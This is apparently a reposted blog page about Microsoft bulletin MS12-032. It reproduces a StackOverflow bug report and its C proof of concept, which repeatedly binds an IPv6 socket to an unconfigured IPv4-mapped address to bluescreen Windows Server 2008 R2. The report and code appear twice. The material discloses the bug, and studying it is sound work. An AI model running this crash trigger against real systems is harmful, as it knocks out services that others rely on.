MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
2012-05-24 11:16
344 查看
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032
Possible MS12-032 Proof of concept from
StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped
invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)
#include
#include
#include
#include
#define IPV6_V6ONLY 27
void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}
void main()
{
MyWsaStartup();
bool bindSuccess = false;
while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}
DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}
sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);
// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;
int size = 28; // 28 is sizeof(sockaddr_in6)
int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}
Possible MS12-032 Proof of concept from
StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped
invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)
#include
#include
#include
#include
#define IPV6_V6ONLY 27
void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}
void main()
{
MyWsaStartup();
bool bindSuccess = false;
while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}
DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}
sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);
// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;
int size = 28; // 28 is sizeof(sockaddr_in6)
int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}
相关文章推荐
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- Increasing the maximum number of tcp/ip connections in linux
- Get IP address of the user in SAP ABAP
- Oracle 安装报错 [INS-06101] IP address of localhost could not be determined 解决方法
- gitlab 安装报错:Could not find modernizr-2.6.2 in any of the sources
- Oracle 安装报错 [INS-06101] IP address of localhost could not be determined 解决方法输入日志标题
- Oracle 安装报错 [INS-06101] IP address of localhost could not be determined 解决方法
- Question 12: In C++, which of the following is the best declaration for an overloaded operator[] to allow read-only access (and
- 奇葩问题:This file could not be checked in because the original version of the file on the server was moved or deleted. A new version of this file has been saved to the server, but your check-in comments were not saved
- "Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased."
- CTS-testIMemoryElevationOfPrivilegeExploit
- TCP/IP Sockets in C#: Practical Guide for Programmers
- Oracle 安装报错 [INS-06101] IP address of localhost could not be determined 解决方法
- Advances in Windows Vista TCP/IP
- could not find an installed version of gradle either in android studio
- idea报 Exception in thread "RMI TCP Connection(idle)" java.lang.OutOfMemoryError: PermGen space
- Direct hosting of SMB over TCP/IP
- [INS-06101] IP address of localhost could not be determined
- [INS-06101] IP address of localhost could not be determined[转]
- 读《Challenges in IoT Networking via TCP/IP Architecture》笔记